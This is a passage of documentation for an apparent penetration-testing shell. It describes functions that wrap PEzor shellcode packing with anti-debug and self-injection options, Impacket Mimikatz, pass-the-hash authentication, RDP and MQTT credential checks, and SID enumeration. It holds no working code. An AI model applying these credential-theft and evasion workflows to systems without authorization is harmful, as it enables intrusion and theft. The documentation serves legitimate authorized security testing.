  4. If line does not match "pass" or "hash", it displays an error message with usage instructions.

Parameters:
line (str): A command argument to determine the authentication mode.
If "pass", the function searches for credential files and authenticates using the selected file.
If "hash", it uses a hash file for authentication.
If neither, it prints an error message with usage instructions.

Returns:
None

extract_ports

Extracts open ports and IP address information from a specified file.

This function performs the following actions:

  1. Reads the specified file to find open ports.
  2. If no port is passed as an argument, extracts the first unique IP address found in the file.
  3. Prints the extracted information to the console.

Parameters:
line (str): The port to get information for.

Returns:
None

cron

Schedules a command to run at a specified time.

This function allows users to schedule a command to execute at a specific hour and minute.
If the specified time has already passed for the current day, the command will be scheduled
to run the following day.

Usage:
cron HH:MM command [args]

Parameters:
line (str): The input string containing the scheduled time in 'HH:MM' format followed by the command and arguments.

Returns:
None

pezorsh

Executes the PEzor tool to pack executables or shellcode with custom configurations.

This function enables the user to construct commands for PEzor with various options.
By default, it prompts for each parameter so that execution does not fail because of
missing values. It supports both executable and shellcode packing, with the ability to
select from a range of PEzor flags to create the desired payload.

The function's capabilities include:

  1. Prompting the user to specify if they want to pack an executable or shellcode.
  2. Gathering parameters for different PEzor flags based on user choices.
  3. Building the command dynamically to execute PEzor.sh with the configured options.

Example commands the function can build:

  • Pack an executable with 64-bit, debug, and anti-debug options.
  • Pack shellcode with self-injection and sleep options.

Usage:
- Run 'PEzor [donut args...]' to pack an executable with donut options.
- Run 'PEzor ' to pack shellcode.

:param line: String containing initial command-line arguments or options.

mimikatzpy

Executes the Impacket Mimikatz tool to interact with a target system for credential-related operations.

This function performs the following actions:

  1. Validates the target IP (rhost).
  2. If the line argument is "pass", it searches for credential files matching the pattern credentials*.txt
    and prompts the user to select a file for executing Mimikatz.
  3. If line is "hash", it searches for a hash file, prompts for a username, and constructs the command using
    the hash for authentication.
  4. If line does not match "pass" or "hash", it displays an error message with usage instructions.

Parameters:
line (str): Command argument specifying the authentication mode.
If "pass", the function authenticates using credentials from a selected file.
If "hash", it uses a hash file for authentication.
If neither, it displays an error message with usage instructions.

Returns:
None

rdp_check_py

Executes the RDP check tool to verify credentials or hash-based authentication on a target system.

This function performs the following actions:

  1. Validates the target IP (rhost).
  2. If the line argument is "pass", it searches for credential files with the pattern credentials*.txt
    and prompts the user to select one to execute the RDP check.
  3. If line is "hash", it searches for a hash file, prompts the user for a username, and constructs the command
    using the hash for authentication.
  4. If line does not match "pass" or "hash", it displays an error message with usage instructions.

Parameters:
line (str): Command argument specifying the authentication mode.
If "pass", the function authenticates using credentials from a selected file.
If "hash", it uses a hash file for authentication.
If neither, it displays an error message with usage instructions.

Returns:
None

mqtt_check_py

Executes the MQTT check tool to verify credentials on a target system with optional SSL.

This function performs the following actions:

  1. Validates the target IP (rhost).
  2. If the line argument is "pass", it searches for credential files matching the pattern credentials*.txt
    and prompts the user to select one to execute the MQTT check.
  3. If line is "ssl", it performs the MQTT check with SSL enabled using the selected credentials.
  4. If line does not match "pass" or "ssl", it displays an error message with usage instructions.

Parameters:
line (str): Command argument specifying the authentication mode.
If "pass", the function authenticates using credentials from a selected file.
If "ssl", it authenticates using SSL.
If neither, it displays an error message with usage instructions.

Returns:
None

lookupsid_py

Executes the LookupSID tool to perform SID enumeration on a target system.

This function performs the following actions:

  1. Validates the target IP (rhost).
  2. If the line argument is "basic", it searches for credential files with the pattern credentials*.txt
    and prompts the user to select one to execute the SID lookup.
  3. If line is "dc-target", it performs the SID lookup specifying domain controller and target IPs,
    using the selected credentials.
  4. If line does not match "basic" or "dc-target", it displays an error message with usage instructions.

Parameters:
line (str): Command argument specifying the lookup mode.
If "basic", the function performs a standard SID lookup.
If "dc-target", it includes -dc-ip and -target-ip arguments.
If neither, it displays an error m...
